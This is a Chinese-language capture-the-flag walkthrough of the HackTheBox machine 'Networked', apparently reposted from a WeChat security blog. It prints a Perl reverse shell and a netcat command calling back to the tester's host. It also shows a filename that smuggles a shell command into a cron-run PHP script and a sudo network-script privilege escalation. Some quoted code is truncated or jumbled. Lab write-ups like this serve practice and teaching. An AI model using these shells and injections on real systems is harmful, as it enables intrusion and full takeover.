大家好,今天给大家带来的CTF挑战靶机是来自hackthebox的“Network”,hackthebox是一个非常不错的在线实验平台,能帮助你提升渗透测试技能和黑盒测试技能,平台上有很多靶机,从易到难,各个级别的靶机都有。
本级靶机难度为困难级别,任务是找到靶机上的user.txt和root.txt。
# 信息枚举
# 漏洞利用
我们首先来检查upload.php
<?php
require '/var/www/html/lib.php';
define("UPLOAD_DIR", "/var/www/html/uploads/");
if( isset($_POST['submit']) ) {
if (!empty($_FILES["myFile"])) {
$myFile = $_FILES["myFile"];
if (!(check_file_type($_FILES["myFile"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) {
echo '<pre>Invalid image file.</pre>';
displayform();
}
if ($myFile["error"] !== UPLOAD_ERR_OK) {
echo "<p>An error occurred.</p>";
displayform();
exit;
}
//$name = $_SERVER['REMOTE_ADDR'].'-'. $myFile["name"];
list ($foo,$ext) = getnameUpload($myFile["name"]);
$validext = array('.jpg', '.png', '.gif', '.jpeg');
$valid = false;
foreach ($validext as $vext) {
if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) {
$valid = true;
}
}
if (!($valid)) {
echo "<p>Invalid image file</p>";
displayform();
exit;
if ((strpos($exploded[0], '10_10_') === 0) && (!($prefix === $_SERVER["REMOTE_ADDR"])) ) {
continue; }
以下为我们webshell的内容
我们上传成功了
# 低权限shell
perl-e 'use Socket;$i="10.10.14.72";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
root@localhost:~/hackthebox_workspace/Networked_146# nc -lvp 4444 [85/85]
listening on [any] 4444 ...
10.10.10.146: inverse host lookup failed: Unknown host
connect to [10.10.14.72] from (UNKNOWN) [10.10.10.146] 49656
sh: no job control in this shell
sh-4.2$ python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
bash-4.2$ ^Z
[1]+ 已停止 nc -lvp 4444
root@localhost:~/hackthebox_workspace/Networked_146# stty raw -echo
root@localhost:~/hackthebox_workspace/Networked_146# nc -lvp 4444 reset
reset: unknown terminal type unnown
Terminal type? xterm
bash-4.2$ export SHELL=bash
bash-4.2$ export TERM=xterm-256color
bash-4.2$ stty rows 36 columns 144
<?php
require '/var/www/html/lib.php';
$path = '/var/www/html/uploads/';
$logpath = '/tmp/attack.log';
$to = 'guly';
$msg= '';
$headers = "X-Mailer: check_attack.phprn";
$files = array();
$files = preg_grep('/^([^.])/', scandir($path));
foreach ($files as $key => $value) {
$msg='';
if ($value == 'index.html') {
continue;
}
#echo "-------------n";
#print "check: $valuen";
list ($name,$ext) = getnameCheck($value);
$check = check_ip($name,$value);
if (!($check[0])) {
echo "attack!n";
# todo: attach file
file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);
exec("rm -f $logpath");
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
echo "rm -f $path$valuen";
mail($to, $msg, $msg, $headers, "-F$value");
}
}
?>
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
$path = '/var/www/html/uploads/';
touch '; nc 10.10.14,72 1234 -c bash'
root@localhost:~/hackthebox_workspace/Networked_146#nc-lvp 1234
listening on [any] 1234 ...
10.10.10.146: inverse host lookup failed: Unknown host
connect to [10.10.14.72] from (UNKNOWN) [10.10.10.146] 46548
ls
check_attack.php
crontab.guly
lse.sh
shell2
user.txt
python -c 'import pty;pty.spawn("/bin/bash")'
[guly@networked ~]$ ^Z
[1]+ 已停止 nc -lvp 1234
root@localhost:~/hackthebox_workspace/Networked_146# fg
nc -lvp 1234
^Z
[1]+ 已停止 nc -lvp 1234
root@localhost:~/hackthebox_workspace/Networked_146# stty raw -echo
root@localhost:~/hackthebox_workspace/Networked_146# nc -lvp 1234 reset
reset: unknown terminal type unknown
Terminal type? xterm
[guly@networked ~]$ export SHELL=bash
[guly@networked ~]$ export TERM=xterm-256color
[guly@networked ~]$ stty rows 36 columns 144
[guly@networked ~]$ cat user.txt
526cfc2305f17faaa***************
最终我们得到了user.txt
# 权限提升
[guly@networked ~]$ sudo -l
Matching Defaults entries for guly on networked:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR
LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT
LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
XAUTHORITY", secure_path=/sbin:/bin:/usr/sbin:/usr/bin
User guly may run the following commands on networked:
(root) NOPASSWD: /usr/local/sbin/changename.sh
检查/usr/local/sbin/changename.sh
#!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
DEVICE=guly0
ONBOOT=no
NM_CONTROLLED=no
EoF
regexp="^[a-zA-Z0-9_ /-]+$"
for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
echo "interface $var:"
read x
while [[ ! $x =~ $regexp ]]; do
echo "wrong input, try again"
echo "interface $var:"
read x
done
echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
done
/sbin/ifup guly0
changename.sh只是接口创建网络脚本,guly激活该接口,他要求这些选项的用户:NAME,PROXY_METHOD,BROWSER_ONLY,BOOTPROTO
https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f
[guly@networked network-scripts]$ sudo /usr/local/sbin/changename.sh
interface NAME:
test bash
interface PROXY_METHOD:
test
interface BROWSER_ONLY:
test
interface BOOTPROTO:
test
[root@networked network-scripts]# id
uid=0(root) gid=0(root) groups=0(root)
[root@networked ~]# cat root.txt
0a8ecda83f1d81251***************
手握日月摘星辰,安全路上永不止步。
- Khan攻防安全实验室
本文始发于微信公众号(Khan安全攻防实验室):Hack the box-Network
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论